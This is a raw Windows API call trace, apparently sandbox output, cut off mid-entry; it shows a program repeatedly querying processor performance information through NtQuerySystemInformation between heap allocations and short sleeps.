RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0290.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0290.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.175] Sleep (dwMilliseconds=0x110) [0290.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0290.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0290.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0290.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0290.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0290.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0290.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0290.193] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0290.194] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.194] Sleep (dwMilliseconds=0x110) [0290.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0290.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0290.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0290.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0290.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0290.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0290.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0290.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0290.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.203] Sleep (dwMilliseconds=0x110) [0290.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0290.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0290.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0290.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0290.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0290.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0290.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0290.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0290.224] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.225] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.225] Sleep (dwMilliseconds=0x110) [0290.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0290.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0290.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0290.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0290.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0290.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0290.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0290.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0290.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.239] Sleep (dwMilliseconds=0x110) [0290.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0290.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0290.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0290.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0290.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0290.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0290.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0290.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0290.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.251] Sleep (dwMilliseconds=0x110) [0290.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0290.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0290.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0290.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0290.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0290.271] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0290.272] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0290.272] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.272] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0290.272] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.272] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.273] Sleep (dwMilliseconds=0x110) [0290.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0290.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0290.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0290.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0290.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0290.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0290.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0290.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0290.286] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.286] Sleep (dwMilliseconds=0x110) [0290.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0290.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.294] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0290.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0290.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0290.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0290.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0290.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0290.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0290.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.300] Sleep (dwMilliseconds=0x110) [0290.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0290.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0290.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0290.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0290.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0290.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0290.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0290.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0290.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.317] Sleep (dwMilliseconds=0x110) [0290.353] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0290.353] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.353] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0290.353] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0290.353] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.354] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0290.354] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0290.354] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.354] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0290.355] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0290.355] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.355] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0290.355] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.356] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.356] Sleep (dwMilliseconds=0x110) [0290.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0290.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0290.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0290.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0290.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0290.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0290.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0290.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0290.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.380] Sleep (dwMilliseconds=0x110) [0290.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0290.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0290.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0290.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0290.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0290.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0290.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0290.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0290.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.395] Sleep (dwMilliseconds=0x110) [0290.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0290.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0290.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0290.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0290.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0290.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0290.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0290.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0290.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.411] Sleep (dwMilliseconds=0x110) [0290.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0290.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0290.426] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0290.426] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.427] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0290.427] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0290.427] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, 